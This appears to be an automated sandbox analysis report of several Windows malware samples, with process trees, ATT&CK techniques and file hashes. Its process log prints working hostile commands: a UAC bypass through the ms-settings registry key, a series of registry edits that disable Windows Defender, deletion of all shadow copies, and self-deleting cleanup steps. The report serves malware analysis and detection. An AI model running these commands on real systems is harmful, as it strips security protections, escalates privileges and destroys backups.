C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4904,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=4388 /prefetch:82⤵PID:7720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5000,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=5036 /prefetch:82⤵PID:11592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5108,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=5096 /prefetch:82⤵PID:5452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4752,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=4740 /prefetch:12⤵PID:4312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5044,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=4628 /prefetch:12⤵PID:7508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4604,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=4880 /prefetch:12⤵PID:4464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4900,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=4832 /prefetch:12⤵PID:10028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4280,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=4820 /prefetch:12⤵PID:10052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3408,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=4760 /prefetch:12⤵PID:9600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5156,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=4612 /prefetch:12⤵PID:10336
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:7656
-
C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe"C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe"1⤵PID:7452
-
C:\Users\Admin\AppData\Local\Temp\is-S8TC1.tmp\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp"C:\Users\Admin\AppData\Local\Temp\is-S8TC1.tmp\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp" /SL5="$105CC,3872572,832512,C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe"2⤵
- Drops file in Program Files directory
- Modifies registry class
PID:1696 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\WindowsPowerShell\Configuration\errorfake.vbs"3⤵PID:8104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.uac.bat" "3⤵PID:7764
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f4⤵
- Modifies registry class
PID:7684
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f4⤵
- Modifies registry class
PID:7424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.wdcloud.bat" "3⤵PID:2416
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:7948
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:5952
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:1848
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:4768
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5900
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4808
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:7280
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:6612
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:7516
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:7200
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:8048
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:1568
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f4⤵PID:6584
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f4⤵PID:5256
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f4⤵PID:5244
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f4⤵PID:3100
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"3⤵PID:8140
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\main.bat" "4⤵PID:6748
-
C:\Windows\SysWOW64\mode.commode 65,105⤵PID:5920
-
-
C:\ProgramData\7z.exe7z.exe e file.zip -p___________26681pwd226pwd25461___________ -oextracted5⤵PID:6260
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_11.zip -oextracted5⤵PID:7556
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_10.zip -oextracted5⤵PID:1336
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_9.zip -oextracted5⤵PID:7180
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_8.zip -oextracted5⤵PID:6920
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_7.zip -oextracted5⤵PID:5652
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵PID:200
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵PID:3896
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵PID:3128
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵PID:5248
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵PID:5124
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵PID:7512
-
-
C:\Windows\SysWOW64\attrib.exeattrib +H "MBSetup.exe"5⤵
- Views/modifies file attributes
PID:1568
-
-
C:\ProgramData\MBSetup.exe"MBSetup.exe"5⤵PID:2716
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 10846⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:7696
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"3⤵PID:6496
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.delete.bat" "4⤵PID:5540
-
C:\Windows\SysWOW64\PING.EXEping -n 60 127.15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del 7z.dll"5⤵PID:8040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:7376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del 7z.exe"5⤵PID:3464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:2496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del main.bat"5⤵PID:8100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:7232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del file.bin"5⤵PID:1480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.run.vbs"5⤵PID:7716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.2run.vbs"5⤵PID:6140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:5244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.uac.bat"5⤵PID:7216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:6884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.wdcloud.bat"5⤵PID:4204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:5888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.delete.bat"5⤵PID:132
-
-
-
-
-
C:\Users\Admin\Desktop\Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe"C:\Users\Admin\Desktop\Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe"1⤵PID:752
-
C:\Users\Admin\Desktop\Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe"C:\Users\Admin\Desktop\Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:8012
-
-
C:\Users\Admin\Desktop\Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe"C:\Users\Admin\Desktop\Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:6740 -
C:\Users\Admin\AppData\Local\Temp\mscongg.exe"C:\Users\Admin\AppData\Local\Temp\mscongg.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:3396 -
C:\Users\Admin\AppData\Local\Temp\mscongg.exe"C:\Users\Admin\AppData\Local\Temp\mscongg.exe"3⤵PID:5736
-
-
C:\Users\Admin\AppData\Local\Temp\mscongg.exe"C:\Users\Admin\AppData\Local\Temp\mscongg.exe"3⤵PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\mscongg.exe"C:\Users\Admin\AppData\Local\Temp\mscongg.exe"3⤵
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
PID:5572
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:492
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:2760
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:7856
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:6660
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:4944
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:1392
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:7504
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:6552
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:7428
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:6948
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:6920
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:2840
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:7872
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:6496
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:6420
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:3896
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
PID:7108
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:10804
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:12216
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:12188
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:3416
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:10032
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:9440
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:10680
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:12144
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:12128
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:10776
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
PID:5224
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵PID:6652
-
-
C:\Windows\system32\vssadmin.EXEC:\Windows\system32\vssadmin.EXE Delete Shadows /All /Quiet1⤵
- Interacts with shadow copies
PID:6904
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:6092
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\f3b56beb7c45400badab3b1ffff97629 /t 2728 /p 50201⤵PID:7252
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\ecdba8a7c3cd447abfe1984b0f6441ff /t 3704 /p 63401⤵PID:5176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:8064
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
1Indicator Removal
3Clear Persistence
1File Deletion
2Modify Registry
5Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Discovery
Browser Information Discovery
1Network Service Discovery
2Network Share Discovery
1Peripheral Device Discovery
2Query Registry
8Remote System Discovery
1System Information Discovery
8System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1System Time Discovery
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5f7db0d40e8d5c99fe2d423629230a258
SHA147199177fcc4cf483a1884fa7b47be4db515b34f
SHA25669e3594e38745d89a76bc72648ab84358e5b1cb93eb15438a932d7f4601b6e11
SHA512b748c7fe50514453582095149515195a540e148874ef1f9506c8a0734a680df9cc4561219bfe1401d711d4330c366a336142ba10cf59b3bff02d567109b3d290
-
Filesize
7KB
MD5fef0aa1e28557e99a7609b906939d792
SHA1e1665ec4d317035b7464db6dbe1805ce49fc21df
SHA256fe5faceef0149fb52414523fda2d7614c759917fe1446e83a71240f68895d8cd
SHA5129fbf8a4d084942c26728a06d96ccdbe104d54d24d8986c4ab091e732ca3a91a6950d53279e6f8ffb1cb1bc818a4367ee1de5535c08c3faf0573796d52dd52984
-
Filesize
13.8MB
MD5eccbd5505efc372a2cda508c75804a08
SHA1f9011ea1ef6e386c0f8c4557dbea1217726f6203
SHA2563ed410db724e5219738e764c3c9a7a575f6f8ba1ee357c2d3f2bf546187f0352
SHA512b7e0b3429c0eb4c3ad811c22c4f0696a40762745dfa10999e60f589c11597edce2945ec4551f2259131d39866a1ee0afdde5e0165eae732a6fbd69b0dd618246
-
Filesize
284KB
MD556356e40abb1d0c5bdf456a7bee043a0
SHA1afaaad597cb96dde2bedd9790e0f93a2195c95f4
SHA256598a3c179345c80922188304bb1d67f9c0eb56843ef07b3249c209d1f04ab172
SHA5124f70c0262a1f3688472b7830b9169d315b6fb77603eceaac56474c9f0ad7a058ea406dcee4577236bb941988cfa450cea206f556223387d8a4eaf0dae782ceb9
-
Filesize
488B
MD5a72a109bf328bba4ae3d24b8be49a35c
SHA1cbf6c04c3f48a89a595ce1460a91abf936a6f5fc
SHA25634b5fbf06668ff29395c3152712d83c5c2926bcfde28b597176a273cb98916ae
SHA5122cdf7acd158205c4bf42ee94993b6783e2d51f2d23eb1f05ac3168c52972ff07032bf1e09443c96fb242972284fdb635163e510c42e48cbfbe713737f0f65440
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
1KB
MD5c830fde2d469ea25922346b9166da248
SHA18dc4fa362b2f79b5294265981256e623553172f9
SHA25659ee85c3ee8a0cb34a2b82168456748731d3ae81d15b0806ed861a5be0c012c1
SHA512a045bca872978579e7d5039fdce839a6de98e4a8e5031a809653cdc0b11832a89d2076be0fc1d8456baaf62947e43934827b37cef815a8cee1918d80280656bd
-
Filesize
138B
MD55a14fa9448a36120fa13e30c1c27cea1
SHA1d9ee005ff4638392b77541a9ceddbf17df53ab82
SHA2569371524b0fdb3d92b5c7c90f040c962ca129395d4688ef898087045223ee6f73
SHA5128f861200363a9d9784b0be584bd90d3dc1f9b7f77710c6bd160e8d7c8989e6330b10e9cfecd25dd13158ab1d28d6925ef9135e73c185fe211de1129122aa2a1f
-
Filesize
366B
MD5408e11f699d802ea56fabac297802c5e
SHA1c07e71e98a52511dfd1c8ffb2803a41d6b9b3f8f
SHA2561e86c340c81834db772c9e1e48f89534eeed9b386bc5b02d5907fc8f71ea4fe4
SHA512e165b551abeba9ee85efc7d89b98fa822c203d24d5ce7e175acb7da43eab944a35a01fb3891ff7ad852a1cc33b549fbb96d84b8f10978bd5332b54fc2a22e126
-
Filesize
131B
MD59acf11d00161e3f209c06e4577eb42c6
SHA1bed9c68c145ce8bdf7f3d60d374891fd57e72bb1
SHA25617432647b9096ed21d2a1ba618e11feef7f055f51abdd19ef23a85142ec1b51b
SHA512271fc2d1264ac153c847a0ad75654bdeb2062217629e68e085f338c22a70e558d9f89c358e5428548f9ab0d754bfcd7d6211696f39535f2672a2b98c65b89baa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\769F85394FB15C375FF89A7488274D5B_DB5B37ABCE19BE2ABD143FD5ABCE10F1
Filesize5B
MD55bfa51f3a417b98e7443eca90fc94703
SHA18c015d80b8a23f780bdd215dc842b0f5551f63bd
SHA256bebe2853a3485d1c2e5c5be4249183e0ddaff9f87de71652371700a89d937128
SHA5124cd03686254bb28754cbaa635ae1264723e2be80ce1dd0f78d1ab7aee72232f5b285f79e488e9c5c49ff343015bd07bb8433d6cee08ae3cea8c317303e3ac399
-
Filesize
8KB
MD5ef742b46ba1e5b67c2c1bc9c60de08a0
SHA1259f87376b46365c3488ed1d29b7856e650598a1
SHA2560f2cd52a46c8d23d17680c5cf6d088c4d9d3b9650177a6acef042447109b49a9
SHA512b053c8076d75de5e7a37fab4c33167eaec9278c37cce6ee2536f818a18ca341c90fa8ea88590a05b112b1dda2f5d81874c1a7c65e52c9c563e743f2b4834988f
-
Filesize
64KB
MD5b5ad5caaaee00cb8cf445427975ae66c
SHA1dcde6527290a326e048f9c3a85280d3fa71e1e22
SHA256b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8
